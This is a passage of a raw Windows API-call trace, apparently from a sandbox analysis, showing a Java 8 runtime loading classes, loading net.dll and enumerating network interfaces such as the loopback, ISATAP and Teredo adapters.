hFile=0x2c8, liDistanceToMove=0x1b6bc, lpNewFilePointer=0x208ce90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ce90*=112316) returned 1 [0110.443] ReadFile (in: hFile=0x2c8, lpBuffer=0x12324960, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ce60, lpOverlapped=0x0 | out: lpBuffer=0x12324960*, lpNumberOfBytesRead=0x208ce60*=0xa0, lpOverlapped=0x0) returned 1 [0110.443] malloc (_Size=0x26) returned 0x12ef1050 [0110.452] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x845, lpNewFilePointer=0x208b550, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b550*=2117) returned 1 [0110.452] ReadFile (in: hFile=0x2d4, lpBuffer=0x208b5a0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b520, lpOverlapped=0x0 | out: lpBuffer=0x208b5a0*, lpNumberOfBytesRead=0x208b520*=0x1e, lpOverlapped=0x0) returned 1 [0110.452] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x87b, lpNewFilePointer=0x208b5b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b5b0*=2171) returned 1 [0110.453] ReadFile (in: hFile=0x2d4, lpBuffer=0x208b6c0, nNumberOfBytesToRead=0x73, lpNumberOfBytesRead=0x208b580, lpOverlapped=0x0 | out: lpBuffer=0x208b6c0*, lpNumberOfBytesRead=0x208b580*=0x73, lpOverlapped=0x0) returned 1 [0110.453] free (_Block=0x12edc830) [0110.453] free (_Block=0x12ef2fc0) [0110.456] strlen (_Str="javax/crypto/CryptoPolicyParser$GrantEntry.class") returned 0x30 [0110.457] strlen (_Str="javax/crypto/CryptoPolicyParser$GrantEntry.class") returned 0x30 [0110.457] malloc (_Size=0x48) returned 0x12ef2980 [0110.457] malloc (_Size=0xa0) returned 0x12324960 [0110.457] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x1c03e, lpNewFilePointer=0x208cdb0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cdb0*=114750) returned 1 [0110.457] ReadFile (in: hFile=0x2c8, lpBuffer=0x12324960, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cd80, lpOverlapped=0x0 | out: lpBuffer=0x12324960*, lpNumberOfBytesRead=0x208cd80*=0xa0, lpOverlapped=0x0) returned 1 [0110.457] malloc (_Size=0x31) returned 0x12ef3e10 [0110.466] strlen (_Str="javax/crypto/JarVerifier.class") returned 0x1e [0110.466] strlen (_Str="javax/crypto/JarVerifier.class") returned 0x1e [0110.466] malloc (_Size=0x48) returned 0x12ef31f0 [0110.466] malloc (_Size=0xa0) returned 0x12324540 [0110.466] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x1b424, lpNewFilePointer=0x208cc50, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cc50*=111652) returned 1 [0110.466] ReadFile (in: hFile=0x2c8, lpBuffer=0x12324540, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cc20, lpOverlapped=0x0 | out: lpBuffer=0x12324540*, lpNumberOfBytesRead=0x208cc20*=0xa0, lpOverlapped=0x0) returned 1 [0110.466] malloc (_Size=0x1f) returned 0x12ef0f90 [0110.474] strlen (_Str="sun/security/util/Pem.class") returned 0x1b [0110.475] malloc (_Size=0x48) returned 0x12ef28e0 [0110.475] malloc (_Size=0xa0) returned 0x12324540 [0110.475] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33e36c3, lpNewFilePointer=0x208b440, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b440*=54408899) returned 1 [0110.475] ReadFile (in: hFile=0x134, lpBuffer=0x12324540, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b410, lpOverlapped=0x0 | out: lpBuffer=0x12324540*, lpNumberOfBytesRead=0x208b410*=0xa0, lpOverlapped=0x0) returned 1 [0110.475] malloc (_Size=0x1c) returned 0x12ef1200 [0110.571] strlen (_Str="sun/security/validator/Validator.class") returned 0x26 [0110.571] malloc (_Size=0x48) returned 0x12ef31f0 [0110.571] malloc (_Size=0xa0) returned 0x12324b70 [0110.571] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33e4073, lpNewFilePointer=0x208b660, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b660*=54411379) returned 1 [0110.571] ReadFile (in: hFile=0x134, lpBuffer=0x12324b70, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b630, lpOverlapped=0x0 | out: lpBuffer=0x12324b70*, lpNumberOfBytesRead=0x208b630*=0xa0, lpOverlapped=0x0) returned 1 [0110.572] malloc (_Size=0x27) returned 0x12ef06f0 [0110.589] strlen (_Str="java/util/Hashtable$KeySet.class") returned 0x20 [0110.589] malloc (_Size=0x48) returned 0x12ef34c0 [0110.589] malloc (_Size=0xa0) returned 0x12324330 [0110.589] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x333c630, lpNewFilePointer=0x208b690, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b690*=53724720) returned 1 [0110.589] ReadFile (in: hFile=0x134, lpBuffer=0x12324330, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b660, lpOverlapped=0x0 | out: lpBuffer=0x12324330*, lpNumberOfBytesRead=0x208b660*=0xa0, lpOverlapped=0x0) returned 1 [0110.590] malloc (_Size=0x21) returned 0x12ef06f0 [0110.638] strlen (_Str="java/net/NetworkInterface.class") returned 0x1f [0110.638] malloc (_Size=0x48) returned 0x12ef2b10 [0110.638] malloc (_Size=0xa0) returned 0x12324540 [0110.638] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33f1f18, lpNewFilePointer=0x208b430, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b430*=54468376) returned 1 [0110.638] ReadFile (in: hFile=0x134, lpBuffer=0x12324540, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b400, lpOverlapped=0x0 | out: lpBuffer=0x12324540*, lpNumberOfBytesRead=0x208b400*=0xa0, lpOverlapped=0x0) returned 1 [0110.638] malloc (_Size=0x20) returned 0x12ef1170 [0110.650] strlen (_Str="") returned 0x0 [0110.650] strlen (_Str=".dll") returned 0x4 [0110.651] strlen (_Str="") returned 0x0 [0110.651] strlen (_Str=".dll") returned 0x4 [0110.651] GetModuleHandleA (lpModuleName=0x0) returned 0x7ff7d5e70000 [0110.651] malloc (_Size=0x8) returned 0x121a5600 [0110.651] strlen (_Str="net.dll") returned 0x7 [0110.651] malloc (_Size=0x8) returned 0x121a5610 [0110.651] strcpy (in: _Dest=0x121a5610, _Source="net.dll" | out: _Dest="net.dll") returned="net.dll" [0110.652] free (_Block=0x121a5600) [0110.652] strlen (_Str="net.dll") returned 0x7 [0110.652] strlen (_Str="net") returned 0x3 [0110.652] strlen (_Str="_JNI_OnLoad@8") returned 0xd [0110.652] malloc (_Size=0x12) returned 0x12edc8b0 [0110.652] strncpy (in: _Dest=0x12edc8b0, _Source="_JNI_OnLoad@8", _Count=0xb | out: _Dest="_JNI_OnLoad") returned="_JNI_OnLoad" [0110.652] strcat (in: _Dest=0x12edc8b0, _Source="_" | out: _Dest="_JNI_OnLoad_") returned="_JNI_OnLoad_" [0110.652] strcat (in: _Dest=0x12edc8b0, _Source="net" | out: _Dest="_JNI_OnLoad_net") returned="_JNI_OnLoad_net" [0110.652] strcat (in: _Dest=0x12edc8b0, _Source="@8" | out: _Dest="_JNI_OnLoad_net@8") returned="_JNI_OnLoad_net@8" [0110.652] free (_Block=0x12edc8b0) [0110.652] strlen (_Str="net") returned 0x3 [0110.652] strlen (_Str="JNI_OnLoad") returned 0xa [0110.652] malloc (_Size=0xf) returned 0x12edc2b0 [0110.653] strcpy (in: _Dest=0x12edc2b0, _Source="JNI_OnLoad" | out: _Dest="JNI_OnLoad") returned="JNI_OnLoad" [0110.653] strcat (in: _Dest=0x12edc2b0, _Source="_" | out: _Dest="JNI_OnLoad_") returned="JNI_OnLoad_" [0110.653] strcat (in: _Dest=0x12edc2b0, _Source="net" | out: _Dest="JNI_OnLoad_net") returned="JNI_OnLoad_net" [0110.653] free (_Block=0x12edc2b0) [0110.653] free (_Block=0x121a5610) [0110.653] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\net.dll") returned 0x2e [0110.653] malloc (_Size=0x68) returned 0x12ec33f0 [0110.653] wcscpy (in: _Dest=0x12ec33f0, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\net.dll" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\net.dll") returned="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\net.dll" [0110.653] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\net.dll", nBufferLength=0x9, lpBuffer=0x208a288, lpFilePart=0x208a280 | out: lpBuffer="", lpFilePart=0x208a280*=0x0) returned 0x2f [0110.653] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\net.dll" (normalized: "c:\\program files\\java\\jre1.8.0_171\\bin\\net.dll"), fInfoLevelId=0x0, lpFileInformation=0x208a020 | out: lpFileInformation=0x208a020*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb32b9b7, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb32b9b7, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb32cd37, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x179c8)) returned 1 [0110.654] free (_Block=0x12ec33f0) [0110.655] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\bin") returned 0x26 [0110.655] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\net.dll") returned 0x2e [0110.655] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\net.dll", lpFindFileData=0x208a2f0 | out: lpFindFileData=0x208a2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb32b9b7, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb32b9b7, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb32cd37, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x179c8, dwReserved0=0x5e26a578, dwReserved1=0x2207ae0, cFileName="net.dll", cAlternateFileName="")) returned 0x425ba0 [0110.655] FindClose (in: hFindFile=0x425ba0 | out: hFindFile=0x425ba0) returned 1 [0110.655] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\bin") returned 0x26 [0110.655] wcslen (_String="net.dll") returned 0x7 [0110.655] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\net.dll") returned 0x2e [0110.656] malloc (_Size=0x2f) returned 0x12ef3b50 [0111.001] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2089e90 | out: lpSystemTimeAsFileTime=0x2089e90*(dwLowDateTime=0x242d29b8, dwHighDateTime=0x1d80c8a)) [0111.001] GetCurrentProcessId () returned 0x1250 [0111.001] GetCurrentThreadId () returned 0x12e4 [0111.001] GetTickCount () returned 0x151a38c [0111.001] QueryPerformanceCounter (in: lpPerformanceCount=0x2089e98 | out: lpPerformanceCount=0x2089e98*=2222610353484) returned 1 [0111.001] _malloc_crt () returned 0x12259cd0 [0111.002] __dllonexit () returned 0x7213eff68000000 [0111.002] __dllonexit () returned 0x7213ee4c8000000 [0111.003] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x2089cc0 | out: lpWSAData=0x2089cc0) returned 0 [0111.003] strlen (_Str="_JNI_OnLoad@8") returned 0xd [0111.003] malloc (_Size=0xf) returned 0x12edc870 [0111.003] strcpy (in: _Dest=0x12edc870, _Source="_JNI_OnLoad@8" | out: _Dest="_JNI_OnLoad@8") returned="_JNI_OnLoad@8" [0111.003] free (_Block=0x12edc870) [0111.003] strlen (_Str="JNI_OnLoad") returned 0xa [0111.003] malloc (_Size=0xc) returned 0x12edc770 [0111.003] strcpy (in: _Dest=0x12edc770, _Source="JNI_OnLoad" | out: _Dest="JNI_OnLoad") returned="JNI_OnLoad" [0111.004] free (_Block=0x12edc770) [0111.012] socket (af=23, type=1, protocol=0) returned 0x2dc [0111.060] closesocket (s=0x2dc) returned 0 [0111.061] free (_Block=0x12ef3b50) [0111.063] strlen (_Str="java/net/InterfaceAddress.class") returned 0x1f [0111.064] malloc (_Size=0x48) returned 0x12ef2b10 [0111.064] malloc (_Size=0xa0) returned 0x12324b70 [0111.064] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33f1c9e, lpNewFilePointer=0x208b3d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b3d0*=54467742) returned 1 [0111.064] ReadFile (in: hFile=0x134, lpBuffer=0x12324b70, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b3a0, lpOverlapped=0x0 | out: lpBuffer=0x12324b70*, lpNumberOfBytesRead=0x208b3a0*=0xa0, lpOverlapped=0x0) returned 1 [0111.064] malloc (_Size=0x20) returned 0x12ef0690 [0111.066] strlen (_Str="java/net/InetAddress.class") returned 0x1a [0111.067] malloc (_Size=0x48) returned 0x12ef28e0 [0111.067] malloc (_Size=0xa0) returned 0x12324330 [0111.067] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3404c4f, lpNewFilePointer=0x208b370, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b370*=54545487) returned 1 [0111.067] ReadFile (in: hFile=0x134, lpBuffer=0x12324330, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b340, lpOverlapped=0x0 | out: lpBuffer=0x12324330*, lpNumberOfBytesRead=0x208b340*=0xa0, lpOverlapped=0x0) returned 1 [0111.069] malloc (_Size=0x1b) returned 0x12ef0960 [0111.074] strlen (_Str="java/net/InetAddress$1.class") returned 0x1c [0111.074] malloc (_Size=0x48) returned 0x12ef2980 [0111.074] malloc (_Size=0xa0) returned 0x12324330 [0111.074] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34047b7, lpNewFilePointer=0x208a600, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208a600*=54544311) returned 1 [0111.074] ReadFile (in: hFile=0x134, lpBuffer=0x12324330, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208a5d0, lpOverlapped=0x0 | out: lpBuffer=0x12324330*, lpNumberOfBytesRead=0x208a5d0*=0xa0, lpOverlapped=0x0) returned 1 [0111.075] malloc (_Size=0x1d) returned 0x12ef0f90 [0111.077] strlen (_Str="") returned 0x0 [0111.077] strlen (_Str=".dll") returned 0x4 [0111.077] strlen (_Str="") returned 0x0 [0111.077] strlen (_Str=".dll") returned 0x4 [0111.077] GetModuleHandleA (lpModuleName=0x0) returned 0x7ff7d5e70000 [0111.077] malloc (_Size=0x8) returned 0x121a5570 [0111.077] strlen (_Str="net.dll") returned 0x7 [0111.077] malloc (_Size=0x8) returned 0x121a56a0 [0111.078] strcpy (in: _Dest=0x121a56a0, _Source="net.dll" | out: _Dest="net.dll") returned="net.dll" [0111.078] free (_Block=0x121a5570) [0111.078] strlen (_Str="net.dll") returned 0x7 [0111.078] strlen (_Str="net") returned 0x3 [0111.078] strlen (_Str="_JNI_OnLoad@8") returned 0xd [0111.078] malloc (_Size=0x12) returned 0x12edc550 [0111.078] strncpy (in: _Dest=0x12edc550, _Source="_JNI_OnLoad@8", _Count=0xb | out: _Dest="_JNI_OnLoad") returned="_JNI_OnLoad" [0111.078] strcat (in: _Dest=0x12edc550, _Source="_" | out: _Dest="_JNI_OnLoad_") returned="_JNI_OnLoad_" [0111.078] strcat (in: _Dest=0x12edc550, _Source="net" | out: _Dest="_JNI_OnLoad_net") returned="_JNI_OnLoad_net" [0111.078] strcat (in: _Dest=0x12edc550, _Source="@8" | out: _Dest="_JNI_OnLoad_net@8") returned="_JNI_OnLoad_net@8" [0111.078] free (_Block=0x12edc550) [0111.078] strlen (_Str="net") returned 0x3 [0111.078] strlen (_Str="JNI_OnLoad") returned 0xa [0111.078] malloc (_Size=0xf) returned 0x12edc830 [0111.078] strcpy (in: _Dest=0x12edc830, _Source="JNI_OnLoad" | out: _Dest="JNI_OnLoad") returned="JNI_OnLoad" [0111.078] strcat (in: _Dest=0x12edc830, _Source="_" | out: _Dest="JNI_OnLoad_") returned="JNI_OnLoad_" [0111.078] strcat (in: _Dest=0x12edc830, _Source="net" | out: _Dest="JNI_OnLoad_net") returned="JNI_OnLoad_net" [0111.079] free (_Block=0x12edc830) [0111.079] free (_Block=0x121a56a0) [0111.079] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\net.dll") returned 0x2e [0111.079] malloc (_Size=0x68) returned 0x12ec3d20 [0111.079] wcscpy (in: _Dest=0x12ec3d20, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\net.dll" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\net.dll") returned="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\net.dll" [0111.079] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\net.dll", nBufferLength=0x9, lpBuffer=0x2089ad8, lpFilePart=0x2089ad0 | out: lpBuffer="", lpFilePart=0x2089ad0*=0x0) returned 0x2f [0111.079] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\net.dll" (normalized: "c:\\program files\\java\\jre1.8.0_171\\bin\\net.dll"), fInfoLevelId=0x0, lpFileInformation=0x2089870 | out: lpFileInformation=0x2089870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb32b9b7, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb32b9b7, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb32cd37, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x179c8)) returned 1 [0111.080] free (_Block=0x12ec3d20) [0111.081] strlen (_Str="java/net/InetAddress$InetAddressHolder.class") returned 0x2c [0111.081] malloc (_Size=0x48) returned 0x12ef2ca0 [0111.081] malloc (_Size=0xa0) returned 0x12324b70 [0111.081] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x340475d, lpNewFilePointer=0x208ac20, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ac20*=54544221) returned 1 [0111.081] ReadFile (in: hFile=0x134, lpBuffer=0x12324b70, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208abf0, lpOverlapped=0x0 | out: lpBuffer=0x12324b70*, lpNumberOfBytesRead=0x208abf0*=0xa0, lpOverlapped=0x0) returned 1 [0111.081] malloc (_Size=0x2d) returned 0x12ef3e10 [0111.083] strlen (_Str="java/net/InetAddress$Cache.class") returned 0x20 [0111.083] malloc (_Size=0x48) returned 0x12ef34c0 [0111.083] malloc (_Size=0xa0) returned 0x12324cd0 [0111.083] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x340470f, lpNewFilePointer=0x208a600, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208a600*=54544143) returned 1 [0111.083] ReadFile (in: hFile=0x134, lpBuffer=0x12324cd0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208a5d0, lpOverlapped=0x0 | out: lpBuffer=0x12324cd0*, lpNumberOfBytesRead=0x208a5d0*=0xa0, lpOverlapped=0x0) returned 1 [0111.083] malloc (_Size=0x21) returned 0x12ef0f90 [0111.097] strlen (_Str="java/net/Inet6AddressImpl") returned 0x19 [0111.097] strlen (_Str="java/net/Inet6AddressImpl.class") returned 0x1f [0111.098] malloc (_Size=0x48) returned 0x12ef28e0 [0111.098] malloc (_Size=0xa0) returned 0x12324b70 [0111.098] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x340461c, lpNewFilePointer=0x208aa70, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208aa70*=54543900) returned 1 [0111.098] ReadFile (in: hFile=0x134, lpBuffer=0x12324b70, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208aa40, lpOverlapped=0x0 | out: lpBuffer=0x12324b70*, lpNumberOfBytesRead=0x208aa40*=0xa0, lpOverlapped=0x0) returned 1 [0111.098] malloc (_Size=0x20) returned 0x12ef1200 [0111.104] strlen (_Str="java/net/InetAddress$2.class") returned 0x1c [0111.104] malloc (_Size=0x48) returned 0x12ef34c0 [0111.104] malloc (_Size=0xa0) returned 0x12324b70 [0111.104] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3404586, lpNewFilePointer=0x208a590, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208a590*=54543750) returned 1 [0111.104] ReadFile (in: hFile=0x134, lpBuffer=0x12324b70, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208a560, lpOverlapped=0x0 | out: lpBuffer=0x12324b70*, lpNumberOfBytesRead=0x208a560*=0xa0, lpOverlapped=0x0) returned 1 [0111.104] malloc (_Size=0x1d) returned 0x12ef1170 [0111.111] strlen (_Str="java/net/Inet4Address.class") returned 0x1b [0111.111] malloc (_Size=0x48) returned 0x12ef34c0 [0111.111] malloc (_Size=0xa0) returned 0x12324330 [0111.111] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3404498, lpNewFilePointer=0x208b370, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b370*=54543512) returned 1 [0111.112] ReadFile (in: hFile=0x134, lpBuffer=0x12324330, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b340, lpOverlapped=0x0 | out: lpBuffer=0x12324330*, lpNumberOfBytesRead=0x208b340*=0xa0, lpOverlapped=0x0) returned 1 [0111.112] malloc (_Size=0x1c) returned 0x12ef1230 [0111.129] strlen (_Str="java/net/Inet6Address.class") returned 0x1b [0111.129] malloc (_Size=0x48) returned 0x12ef28e0 [0111.129] malloc (_Size=0xa0) returned 0x12324330 [0111.129] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3404279, lpNewFilePointer=0x208b370, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b370*=54542969) returned 1 [0111.129] ReadFile (in: hFile=0x134, lpBuffer=0x12324330, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b340, lpOverlapped=0x0 | out: lpBuffer=0x12324330*, lpNumberOfBytesRead=0x208b340*=0xa0, lpOverlapped=0x0) returned 1 [0111.130] malloc (_Size=0x1c) returned 0x12ef1170 [0111.133] strlen (_Str="java/net/Inet6Address$Inet6AddressHolder.class") returned 0x2e [0111.134] malloc (_Size=0x48) returned 0x12ef2b10 [0111.134] malloc (_Size=0xa0) returned 0x123245f0 [0111.134] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3404054, lpNewFilePointer=0x208ac40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ac40*=54542420) returned 1 [0111.134] ReadFile (in: hFile=0x134, lpBuffer=0x123245f0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ac10, lpOverlapped=0x0 | out: lpBuffer=0x123245f0*, lpNumberOfBytesRead=0x208ac10*=0xa0, lpOverlapped=0x0) returned 1 [0111.134] malloc (_Size=0x2f) returned 0x12ef3b50 [0111.143] strlen (_Str="java/net/DefaultInterface.class") returned 0x1f [0111.143] malloc (_Size=0x48) returned 0x12ef34c0 [0111.143] malloc (_Size=0xa0) returned 0x12324b70 [0111.143] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33f1c51, lpNewFilePointer=0x208ab00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ab00*=54467665) returned 1 [0111.144] ReadFile (in: hFile=0x134, lpBuffer=0x12324b70, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208aad0, lpOverlapped=0x0 | out: lpBuffer=0x12324b70*, lpNumberOfBytesRead=0x208aad0*=0xa0, lpOverlapped=0x0) returned 1 [0111.145] malloc (_Size=0x20) returned 0x12ef1260 [0111.146] malloc (_Size=0x360) returned 0x12f08020 [0111.146] LoadLibraryA (lpLibFileName="IPHLPAPI.DLL") returned 0x7ffb57360000 [0111.172] GetProcAddress (hModule=0x7ffb57360000, lpProcName="GetIfTable") returned 0x7ffb573789c0 [0111.173] GetIfTable (in: pIfTable=0x12f08020, pdwSize=0x208c4b0, bOrder=1 | out: pIfTable=0x12f08020, pdwSize=0x208c4b0) returned 0x7a [0111.178] realloc (_Block=0x12f08020, _Size=0x3c84) returned 0x12f08020 [0111.178] GetIfTable (in: pIfTable=0x12f08020, pdwSize=0x208c4b0, bOrder=1 | out: pIfTable=0x12f08020, pdwSize=0x208c4b0) returned 0x0 [0111.180] strncpy_s (in: _Dst=0x208c4e8, _DstSize=0x8, _Src="lo", _MaxCount=0xffffffffffffffff | out: _Dst="lo") returned 0x0 [0111.180] calloc (_Count=0x1, _Size=0x40) returned 0x12ef28e0 [0111.180] MultiByteToWideChar (in: CodePage=0x1, dwFlags=0x0, lpMultiByteStr=0x12f08280, cbMultiByte=30, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0111.181] malloc (_Size=0x3d) returned 0x12ef2b10 [0111.181] strlen (_Str="lo") returned 0x2 [0111.181] malloc (_Size=0x3) returned 0x121a5570 [0111.181] strcpy (in: _Dest=0x121a5570, _Source="lo" | out: _Dest="lo") returned="lo" [0111.181] MultiByteToWideChar (in: CodePage=0x1, dwFlags=0x0, lpMultiByteStr=0x12f08280, cbMultiByte=30, lpWideCharStr=0x12ef2b10, cchWideChar=30 | out: lpWideCharStr="Software Loopback Interface 1") returned 30 [0111.182] GetProcAddress (hModule=0x7ffb57360000, lpProcName="GetFriendlyIfIndex") returned 0x7ffb5737df60 [0111.182] GetFriendlyIfIndex (IfIndex=0x1) returned 0x1 [0111.182] _snprintf_s (in: _DstBuf=0x208c4e8, _DstSize=0x8, _MaxCount=0xffffffffffffffff, _Format="eth%d" | out: _DstBuf="eth0") returned 4 [0111.182] calloc (_Count=0x1, _Size=0x40) returned 0x12ef2980 [0111.182] MultiByteToWideChar (in: CodePage=0x1, dwFlags=0x0, lpMultiByteStr=0x12f085dc, cbMultiByte=39, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 39 [0111.182] malloc (_Size=0x4f) returned 0x12ee9680 [0111.182] strlen (_Str="eth0") returned 0x4 [0111.182] malloc (_Size=0x5) returned 0x121a56c0 [0111.182] strcpy (in: _Dest=0x121a56c0, _Source="eth0" | out: _Dest="eth0") returned="eth0" [0111.182] MultiByteToWideChar (in: CodePage=0x1, dwFlags=0x0, lpMultiByteStr=0x12f085dc, cbMultiByte=39, lpWideCharStr=0x12ee9680, cchWideChar=39 | out: lpWideCharStr="Microsoft Kernel Debug Network Adapter") returned 39 [0111.182] GetFriendlyIfIndex (IfIndex=0x2) returned 0x2 [0111.182] _snprintf_s (in: _DstBuf=0x208c4e8, _DstSize=0x8, _MaxCount=0xffffffffffffffff, _Format="net%d" | out: _DstBuf="net0") returned 4 [0111.182] calloc (_Count=0x1, _Size=0x40) returned 0x12ef29d0 [0111.182] MultiByteToWideChar (in: CodePage=0x1, dwFlags=0x0, lpMultiByteStr=0x12f08938, cbMultiByte=25, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 25 [0111.182] malloc (_Size=0x33) returned 0x12ef3b50 [0111.183] strlen (_Str="net0") returned 0x4 [0111.183] malloc (_Size=0x5) returned 0x121a5600 [0111.183] strcpy (in: _Dest=0x121a5600, _Source="net0" | out: _Dest="net0") returned="net0" [0111.183] MultiByteToWideChar (in: CodePage=0x1, dwFlags=0x0, lpMultiByteStr=0x12f08938, cbMultiByte=25, lpWideCharStr=0x12ef3b50, cchWideChar=25 | out: lpWideCharStr="Microsoft ISATAP Adapter") returned 25 [0111.183] GetFriendlyIfIndex (IfIndex=0x3) returned 0x3 [0111.183] _snprintf_s (in: _DstBuf=0x208c4e8, _DstSize=0x8, _MaxCount=0xffffffffffffffff, _Format="net%d" | out: _DstBuf="net1") returned 4 [0111.183] calloc (_Count=0x1, _Size=0x40) returned 0x12ef2b60 [0111.183] MultiByteToWideChar (in: CodePage=0x1, dwFlags=0x0, lpMultiByteStr=0x12f08c94, cbMultiByte=34, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 34 [0111.183] malloc (_Size=0x45) returned 0x12ef2ca0 [0111.183] strlen (_Str="net1") returned 0x4 [0111.183] malloc (_Size=0x5) returned 0x121a55c0 [0111.183] strcpy (in: _Dest=0x121a55c0, _Source="net1" | out: _Dest="net1") returned="net1" [0111.183] MultiByteToWideChar (in: CodePage=0x1, dwFlags=0x0, lpMultiByteStr=0x12f08c94, cbMultiByte=34, lpWideCharStr=0x12ef2ca0, cchWideChar=34 | out: lpWideCharStr="Teredo Tunneling Pseudo-Interface") returned 34 [0111.183] GetFriendlyIfIndex (IfIndex=0x4) returned 0x4 [0111.183] _snprintf_s (in: _DstBuf=0x208c4e8, _DstSize=0x8, _MaxCount=0xffffffffffffffff, _Format="eth%d" | out: _DstBuf="eth1") returned 4 [0111.183] calloc (_Count=0x1, _Size=0x40) returned 0x12ef2cf0 [0111.183] MultiByteToWideChar (in: CodePage=0x1, dwFlags=0x0, lpMultiByteStr=0x12f08ff0, cbMultiByte=43, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0111.183] malloc 